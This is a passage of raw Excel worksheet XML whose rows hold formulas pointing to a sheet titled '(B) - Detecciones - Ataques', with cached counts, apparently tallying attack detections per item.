      </c>
      <c r="E80" s="145" t="s">
        <v>784</v>
      </c>
      <c r="F80" s="280">
        <f>'(B) - Detecciones - Ataques'!P72</f>
        <v>1</v>
      </c>
      <c r="G80" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ72</f>
        <v>0</v>
      </c>
      <c r="H80" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ72</f>
        <v>0</v>
      </c>
      <c r="I80" s="271">
        <f>'(B) - Detecciones - Ataques'!AS72</f>
        <v>0</v>
      </c>
      <c r="J80" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ72</f>
        <v>0</v>
      </c>
      <c r="K80" s="271">
        <f>'(B) - Detecciones - Ataques'!BP72</f>
        <v>0</v>
      </c>
      <c r="L80" s="281">
        <f>'(B) - Detecciones - Ataques'!BW72</f>
        <v>0</v>
      </c>
      <c r="M80" s="271">
        <f>'(B) - Detecciones - Ataques'!CM72</f>
        <v>0</v>
      </c>
      <c r="N80" s="281">
        <f>'(B) - Detecciones - Ataques'!CT72</f>
        <v>0</v>
      </c>
      <c r="O80" s="280">
        <f>'(B) - Detecciones - Ataques'!EC72</f>
        <v>0</v>
      </c>
      <c r="P80" s="281">
        <f>'(B) - Detecciones - Ataques'!ED72</f>
        <v>0</v>
      </c>
      <c r="Q80" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL80" s="287" t="s">
        <v>1310</v>
      </c>
      <c r="AM80" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN80" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO80" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP80" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ80" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS80" s="287" t="s">
        <v>1310</v>
      </c>
      <c r="AT80" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU80" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV80" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW80" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX80" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="60.0" customHeight="1">
      <c r="B81" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C81" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D81" s="143" t="s">
        <v>756</v>
      </c>
      <c r="E81" s="145" t="s">
        <v>788</v>
      </c>
      <c r="F81" s="280">
        <f>'(B) - Detecciones - Ataques'!P73</f>
        <v>1</v>
      </c>
      <c r="G81" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ73</f>
        <v>0</v>
      </c>
      <c r="H81" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ73</f>
        <v>0</v>
      </c>
      <c r="I81" s="271">
        <f>'(B) - Detecciones - Ataques'!AS73</f>
        <v>0</v>
      </c>
      <c r="J81" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ73</f>
        <v>0</v>
      </c>
      <c r="K81" s="271">
        <f>'(B) - Detecciones - Ataques'!BP73</f>
        <v>0</v>
      </c>
      <c r="L81" s="281">
        <f>'(B) - Detecciones - Ataques'!BW73</f>
        <v>0</v>
      </c>
      <c r="M81" s="271">
        <f>'(B) - Detecciones - Ataques'!CM73</f>
        <v>0</v>
      </c>
      <c r="N81" s="281">
        <f>'(B) - Detecciones - Ataques'!CT73</f>
        <v>0</v>
      </c>
      <c r="O81" s="280">
        <f>'(B) - Detecciones - Ataques'!EC73</f>
        <v>0</v>
      </c>
      <c r="P81" s="281">
        <f>'(B) - Detecciones - Ataques'!ED73</f>
        <v>0</v>
      </c>
      <c r="Q81" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL81" s="287" t="s">
        <v>1318</v>
      </c>
      <c r="AM81" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN81" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO81" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP81" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ81" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS81" s="287" t="s">
        <v>1318</v>
      </c>
      <c r="AT81" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU81" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV81" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW81" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX81" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="82" ht="60.0" customHeight="1">
      <c r="B82" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C82" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D82" s="143" t="s">
        <v>756</v>
      </c>
      <c r="E82" s="145" t="s">
        <v>798</v>
      </c>
      <c r="F82" s="280">
        <f>'(B) - Detecciones - Ataques'!P74</f>
        <v>1</v>
      </c>
      <c r="G82" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ74</f>
        <v>1</v>
      </c>
      <c r="H82" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ74</f>
        <v>1</v>
      </c>
      <c r="I82" s="271">
        <f>'(B) - Detecciones - Ataques'!AS74</f>
        <v>0</v>
      </c>
      <c r="J82" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ74</f>
        <v>0</v>
      </c>
      <c r="K82" s="271">
        <f>'(B) - Detecciones - Ataques'!BP74</f>
        <v>0</v>
      </c>
      <c r="L82" s="281">
        <f>'(B) - Detecciones - Ataques'!BW74</f>
        <v>0</v>
      </c>
      <c r="M82" s="271">
        <f>'(B) - Detecciones - Ataques'!CM74</f>
        <v>0</v>
      </c>
      <c r="N82" s="281">
        <f>'(B) - Detecciones - Ataques'!CT74</f>
        <v>0</v>
      </c>
      <c r="O82" s="280">
        <f>'(B) - Detecciones - Ataques'!EC74</f>
        <v>1</v>
      </c>
      <c r="P82" s="281">
        <f>'(B) - Detecciones - Ataques'!ED74</f>
        <v>1</v>
      </c>
      <c r="Q82" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL82" s="287" t="s">
        <v>1326</v>
      </c>
      <c r="AM82" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN82" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO82" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP82" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ82" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS82" s="287" t="s">
        <v>1326</v>
      </c>
      <c r="AT82" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU82" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV82" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW82" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX82" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="83" ht="60.0" customHeight="1">
      <c r="B83" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C83" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D83" s="143" t="s">
        <v>756</v>
      </c>
      <c r="E83" s="145" t="s">
        <v>806</v>
      </c>
      <c r="F83" s="280">
        <f>'(B) - Detecciones - Ataques'!P75</f>
        <v>1</v>
      </c>
      <c r="G83" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ75</f>
        <v>0</v>
      </c>
      <c r="H83" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ75</f>
        <v>0</v>
      </c>
      <c r="I83" s="271">
        <f>'(B) - Detecciones - Ataques'!AS75</f>
        <v>0</v>
      </c>
      <c r="J83" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ75</f>
        <v>0</v>
      </c>
      <c r="K83" s="271">
        <f>'(B) - Detecciones - Ataques'!BP75</f>
        <v>0</v>
      </c>
      <c r="L83" s="281">
        <f>'(B) - Detecciones - Ataques'!BW75</f>
        <v>0</v>
      </c>
      <c r="M83" s="271">
        <f>'(B) - Detecciones - Ataques'!CM75</f>
        <v>0</v>
      </c>
      <c r="N83" s="281">
        <f>'(B) - Detecciones - Ataques'!CT75</f>
        <v>0</v>
      </c>
      <c r="O83" s="280">
        <f>'(B) - Detecciones - Ataques'!EC75</f>
        <v>0</v>
      </c>
      <c r="P83" s="281">
        <f>'(B) - Detecciones - Ataques'!ED75</f>
        <v>0</v>
      </c>
      <c r="Q83" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL83" s="287" t="s">
        <v>1338</v>
      </c>
      <c r="AM83" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN83" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO83" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP83" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ83" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS83" s="287" t="s">
        <v>1338</v>
      </c>
      <c r="AT83" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU83" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV83" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW83" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX83" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="84" ht="60.0" customHeight="1">
      <c r="B84" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C84" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D84" s="143" t="s">
        <v>756</v>
      </c>
      <c r="E84" s="145" t="s">
        <v>813</v>
      </c>
      <c r="F84" s="280">
        <f>'(B) - Detecciones - Ataques'!P76</f>
        <v>1</v>
      </c>
      <c r="G84" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ76</f>
        <v>0</v>
      </c>
      <c r="H84" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ76</f>
        <v>0</v>
      </c>
      <c r="I84" s="271">
        <f>'(B) - Detecciones - Ataques'!AS76</f>
        <v>0</v>
      </c>
      <c r="J84" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ76</f>
        <v>0</v>
      </c>
      <c r="K84" s="271">
        <f>'(B) - Detecciones - Ataques'!BP76</f>
        <v>0</v>
      </c>
      <c r="L84" s="281">
        <f>'(B) - Detecciones - Ataques'!BW76</f>
        <v>0</v>
      </c>
      <c r="M84" s="271">
        <f>'(B) - Detecciones - Ataques'!CM76</f>
        <v>0</v>
      </c>
      <c r="N84" s="281">
        <f>'(B) - Detecciones - Ataques'!CT76</f>
        <v>0</v>
      </c>
      <c r="O84" s="280">
        <f>'(B) - Detecciones - Ataques'!EC76</f>
        <v>0</v>
      </c>
      <c r="P84" s="281">
        <f>'(B) - Detecciones - Ataques'!ED76</f>
        <v>0</v>
      </c>
      <c r="Q84" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL84" s="287" t="s">
        <v>1349</v>
      </c>
      <c r="AM84" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN84" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO84" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP84" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ84" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS84" s="287" t="s">
        <v>1349</v>
      </c>
      <c r="AT84" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU84" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV84" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW84" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX84" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="85" ht="60.0" customHeight="1">
      <c r="B85" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C85" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D85" s="143" t="s">
        <v>756</v>
      </c>
      <c r="E85" s="145" t="s">
        <v>821</v>
      </c>
      <c r="F85" s="280">
        <f>'(B) - Detecciones - Ataques'!P77</f>
        <v>1</v>
      </c>
      <c r="G85" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ77</f>
        <v>0</v>
      </c>
      <c r="H85" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ77</f>
        <v>0</v>
      </c>
      <c r="I85" s="271">
        <f>'(B) - Detecciones - Ataques'!AS77</f>
        <v>0</v>
      </c>
      <c r="J85" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ77</f>
        <v>0</v>
      </c>
      <c r="K85" s="271">
        <f>'(B) - Detecciones - Ataques'!BP77</f>
        <v>0</v>
      </c>
      <c r="L85" s="281">
        <f>'(B) - Detecciones - Ataques'!BW77</f>
        <v>0</v>
      </c>
      <c r="M85" s="271">
        <f>'(B) - Detecciones - Ataques'!CM77</f>
        <v>0</v>
      </c>
      <c r="N85" s="281">
        <f>'(B) - Detecciones - Ataques'!CT77</f>
        <v>0</v>
      </c>
      <c r="O85" s="280">
        <f>'(B) - Detecciones - Ataques'!EC77</f>
        <v>0</v>
      </c>
      <c r="P85" s="281">
        <f>'(B) - Detecciones - Ataques'!ED77</f>
        <v>0</v>
      </c>
      <c r="Q85" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL85" s="287" t="s">
        <v>1360</v>
      </c>
      <c r="AM85" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN85" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO85" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP85" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ85" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS85" s="287" t="s">
        <v>1360</v>
      </c>
      <c r="AT85" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU85" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV85" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW85" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX85" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="60.0" customHeight="1">
      <c r="B86" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C86" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D86" s="143" t="s">
        <v>825</v>
      </c>
      <c r="E86" s="145" t="s">
        <v>1518</v>
      </c>
      <c r="F86" s="280">
        <f>'(B) - Detecciones - Ataques'!P78</f>
        <v>1</v>
      </c>
      <c r="G86" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ78</f>
        <v>0</v>
      </c>
      <c r="H86" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ78</f>
        <v>0</v>
      </c>
      <c r="I86" s="271">
        <f>'(B) - Detecciones - Ataques'!AS78</f>
        <v>0</v>
      </c>
      <c r="J86" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ78</f>
        <v>0</v>
      </c>
      <c r="K86" s="271">
        <f>'(B) - Detecciones - Ataques'!BP78</f>
        <v>0</v>
      </c>
      <c r="L86" s="281">
        <f>'(B) - Detecciones - Ataques'!BW78</f>
        <v>0</v>
      </c>
      <c r="M86" s="271">
        <f>'(B) - Detecciones - Ataques'!CM78</f>
        <v>0</v>
      </c>
      <c r="N86" s="281">
        <f>'(B) - Detecciones - Ataques'!CT78</f>
        <v>0</v>
      </c>
      <c r="O86" s="280">
        <f>'(B) - Detecciones - Ataques'!EC78</f>
        <v>0</v>
      </c>
      <c r="P86" s="281">
        <f>'(B) - Detecciones - Ataques'!ED78</f>
        <v>0</v>
      </c>
      <c r="Q86" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL86" s="287" t="s">
        <v>1372</v>
      </c>
      <c r="AM86" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN86" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO86" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP86" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ86" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS86" s="287" t="s">
        <v>1372</v>
      </c>
      <c r="AT86" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU86" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV86" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW86" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX86" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="87" ht="60.0" customHeight="1">
      <c r="B87" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C87" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D87" s="143" t="s">
        <v>834</v>
      </c>
      <c r="E87" s="145" t="s">
        <v>839</v>
      </c>
      <c r="F87" s="280">
        <f>'(B) - Detecciones - Ataques'!P79</f>
        <v>1</v>
      </c>
      <c r="G87" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ79</f>
        <v>0</v>
      </c>
      <c r="H87" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ79</f>
        <v>0</v>
      </c>
      <c r="I87" s="271">
        <f>'(B) - Detecciones - Ataques'!AS79</f>
        <v>0</v>
      </c>
      <c r="J87" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ79</f>
        <v>0</v>
      </c>
      <c r="K87" s="271">
        <f>'(B) - Detecciones - Ataques'!BP79</f>
        <v>0</v>
      </c>
      <c r="L87" s="281">
        <f>'(B) - Detecciones - Ataques'!BW79</f>
        <v>0</v>
      </c>
      <c r="M87" s="271">
        <f>'(B) - Detecciones - Ataques'!CM79</f>
        <v>0</v>
      </c>
      <c r="N87" s="281">
        <f>'(B) - Detecciones - Ataques'!CT79</f>
        <v>0</v>
      </c>
      <c r="O87" s="280">
        <f>'(B) - Detecciones - Ataques'!EC79</f>
        <v>10</v>
      </c>
      <c r="P87" s="281">
        <f>'(B) - Detecciones - Ataques'!ED79</f>
        <v>10</v>
      </c>
      <c r="Q87" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL87" s="300" t="s">
        <v>1377</v>
      </c>
      <c r="AM87" s="301">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN87" s="301">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO87" s="289">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP87" s="301">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ87" s="290">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS87" s="300" t="s">
        <v>1377</v>
      </c>
      <c r="AT87" s="301">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU87" s="301">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV87" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW87" s="301">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX87" s="290">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="60.0" customHeight="1">
      <c r="B88" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C88" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D88" s="143" t="s">
        <v>842</v>
      </c>
      <c r="E88" s="145" t="s">
        <v>848</v>
      </c>
      <c r="F88" s="280">
        <f>'(B) - Detecciones - Ataques'!P80</f>
        <v>1</v>
      </c>
      <c r="G88" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ80</f>
        <v>0</v>
      </c>
      <c r="H88" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ80</f>
        <v>0</v>
      </c>
      <c r="I88" s="271">
        <f>'(B) - Detecciones - Ataques'!AS80</f>
        <v>0</v>
      </c>
      <c r="J88" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ80</f>
        <v>0</v>
      </c>
      <c r="K88" s="271">
        <f>'(B) - Detecciones - Ataques'!BP80</f>
        <v>0</v>
      </c>
      <c r="L88" s="281">
        <f>'(B) - Detecciones - Ataques'!BW80</f>
        <v>0</v>
      </c>
      <c r="M88" s="271">
        <f>'(B) - Detecciones - Ataques'!CM80</f>
        <v>0</v>
      </c>
      <c r="N88" s="281">
        <f>'(B) - Detecciones - Ataques'!CT80</f>
        <v>0</v>
      </c>
      <c r="O88" s="280">
        <f>'(B) - Detecciones - Ataques'!EC80</f>
        <v>1</v>
      </c>
      <c r="P88" s="281">
        <f>'(B) - Detecciones - Ataques'!ED80</f>
        <v>1</v>
      </c>
      <c r="Q88" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM88" s="299"/>
      <c r="AN88" s="299"/>
      <c r="AO88" s="298"/>
      <c r="AP88" s="299"/>
      <c r="AQ88" s="298"/>
    </row>
    <row r="89" ht="60.0" customHeight="1">
      <c r="B89" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C89" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D89" s="143" t="s">
        <v>854</v>
      </c>
      <c r="E89" s="145" t="s">
        <v>858</v>
      </c>
      <c r="F89" s="280">
        <f>'(B) - Detecciones - Ataques'!P81</f>
        <v>1</v>
      </c>
      <c r="G89" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ81</f>
        <v>0</v>
      </c>
      <c r="H89" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ81</f>
        <v>0</v>
      </c>
      <c r="I89" s="271">
        <f>'(B) - Detecciones - Ataques'!AS81</f>
        <v>0</v>
      </c>
      <c r="J89" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ81</f>
        <v>0</v>
      </c>
      <c r="K89" s="271">
        <f>'(B) - Detecciones - Ataques'!BP81</f>
        <v>0</v>
      </c>
      <c r="L89" s="281">
        <f>'(B) - Detecciones - Ataques'!BW81</f>
        <v>0</v>
      </c>
      <c r="M89" s="271">
        <f>'(B) - Detecciones - Ataques'!CM81</f>
        <v>0</v>
      </c>
      <c r="N89" s="281">
        <f>'(B) - Detecciones - Ataques'!CT81</f>
        <v>0</v>
      </c>
      <c r="O89" s="280">
        <f>'(B) - Detecciones - Ataques'!EC81</f>
        <v>1</v>
      </c>
      <c r="P89" s="281">
        <f>'(B) - Detecciones - Ataques'!ED81</f>
        <v>1</v>
      </c>
      <c r="Q89" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM89" s="299"/>
      <c r="AN89" s="299"/>
      <c r="AO89" s="298"/>
      <c r="AP89" s="299"/>
      <c r="AQ89" s="298"/>
    </row>
    <row r="90" ht="60.0" customHeight="1">
      <c r="B90" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C90" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D90" s="143" t="s">
        <v>867</v>
      </c>
      <c r="E90" s="145" t="s">
        <v>871</v>
      </c>
      <c r="F90" s="280">
        <f>'(B) - Detecciones - Ataques'!P82</f>
        <v>1</v>
      </c>
      <c r="G90" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ82</f>
        <v>1</v>
      </c>
      <c r="H90" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ82</f>
        <v>1</v>
      </c>
      <c r="I90" s="271">
        <f>'(B) - Detecciones - Ataques'!AS82</f>
        <v>0</v>
      </c>
      <c r="J90" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ82</f>
        <v>0</v>
      </c>
      <c r="K90" s="271">
        <f>'(B) - Detecciones - Ataques'!BP82</f>
        <v>1</v>
      </c>
      <c r="L90" s="281">
        <f>'(B) - Detecciones - Ataques'!BW82</f>
        <v>1</v>
      </c>
      <c r="M90" s="271">
        <f>'(B) - Detecciones - Ataques'!CM82</f>
        <v>1</v>
      </c>
      <c r="N90" s="281">
        <f>'(B) - Detecciones - Ataques'!CT82</f>
        <v>1</v>
      </c>
      <c r="O90" s="280">
        <f>'(B) - Detecciones - Ataques'!EC82</f>
        <v>1</v>
      </c>
      <c r="P90" s="281">
        <f>'(B) - Detecciones - Ataques'!ED82</f>
        <v>1</v>
      </c>
      <c r="Q90" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM90" s="299"/>
      <c r="AN90" s="299"/>
      <c r="AO90" s="298"/>
      <c r="AP90" s="299"/>
      <c r="AQ90" s="298"/>
    </row>
    <row r="91" ht="60.0" customHeight="1">
      <c r="B91" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C91" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D91" s="143" t="s">
        <v>882</v>
      </c>
      <c r="E91" s="145" t="s">
        <v>888</v>
      </c>
      <c r="F91" s="280">
        <f>'(B) - Detecciones - Ataques'!P83</f>
        <v>1</v>
      </c>
      <c r="G91" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ83</f>
        <v>0</v>
      </c>
      <c r="H91" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ83</f>
        <v>0</v>
      </c>
      <c r="I91" s="271">
        <f>'(B) - Detecciones - Ataques'!AS83</f>
        <v>0</v>
      </c>
      <c r="J91" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ83</f>
        <v>0</v>
      </c>
      <c r="K91" s="271">
        <f>'(B) - Detecciones - Ataques'!BP83</f>
        <v>0</v>
      </c>
      <c r="L91" s="281">
        <f>'(B) - Detecciones - Ataques'!BW83</f>
        <v>0</v>
      </c>
      <c r="M91" s="271">
        <f>'(B) - Detecciones - Ataques'!CM83</f>
        <v>0</v>
      </c>
      <c r="N91" s="281">
        <f>'(B) - Detecciones - Ataques'!CT83</f>
        <v>0</v>
      </c>
      <c r="O91" s="280">
        <f>'(B) - Detecciones - Ataques'!EC83</f>
        <v>0</v>
      </c>
      <c r="P91" s="281">
        <f>'(B) - Detecciones - Ataques'!ED83</f>
        <v>0</v>
      </c>
      <c r="Q91" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM91" s="299"/>
      <c r="AN91" s="299"/>
      <c r="AO91" s="298"/>
      <c r="AP91" s="299"/>
      <c r="AQ91" s="298"/>
    </row>
    <row r="92" ht="60.0" customHeight="1">
      <c r="B92" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C92" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D92" s="143" t="s">
        <v>896</v>
      </c>
      <c r="E92" s="145" t="s">
        <v>901</v>
      </c>
      <c r="F92" s="280">
        <f>'(B) - Detecciones - Ataques'!P84</f>
        <v>1</v>
      </c>
      <c r="G92" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ84</f>
        <v>0</v>
      </c>
      <c r="H92" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ84</f>
        <v>0</v>
      </c>
      <c r="I92" s="271">
        <f>'(B) - Detecciones - Ataques'!AS84</f>
        <v>0</v>
      </c>
      <c r="J92" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ84</f>
        <v>0</v>
      </c>
      <c r="K92" s="271">
        <f>'(B) - Detecciones - Ataques'!BP84</f>
        <v>0</v>
      </c>
      <c r="L92" s="281">
        <f>'(B) - Detecciones - Ataques'!BW84</f>
        <v>0</v>
      </c>
      <c r="M92" s="271">
        <f>'(B) - Detecciones - Ataques'!CM84</f>
        <v>0</v>
      </c>
      <c r="N92" s="281">
        <f>'(B) - Detecciones - Ataques'!CT84</f>
        <v>0</v>
      </c>
      <c r="O92" s="280">
        <f>'(B) - Detecciones - Ataques'!EC84</f>
        <v>0</v>
      </c>
      <c r="P92" s="281">
        <f>'(B) - Detecciones - Ataques'!ED84</f>
        <v>0</v>
      </c>
      <c r="Q92" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL92" s="302"/>
      <c r="AM92" s="299"/>
      <c r="AN92" s="299"/>
      <c r="AO92" s="298"/>
      <c r="AP92" s="299"/>
      <c r="AQ92" s="298"/>
    </row>
    <row r="93" ht="60.0" customHeight="1">
      <c r="B93" s="142" t="s">
        <v>351</v>
      </c>
      <c r="C93" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D93" s="143" t="s">
        <v>911</v>
      </c>
      <c r="E93" s="145" t="s">
        <v>917</v>
      </c>
      <c r="F93" s="280">
        <f>'(B) - Detecciones - Ataques'!P85</f>
        <v>1</v>
      </c>
      <c r="G93" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ85</f>
        <v>0</v>
      </c>
      <c r="H93" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ85</f>
        <v>0</v>
      </c>
      <c r="I93" s="271">
        <f>'(B) - Detecciones - Ataques'!AS85</f>
        <v>0</v>
      </c>
      <c r="J93" s="281">
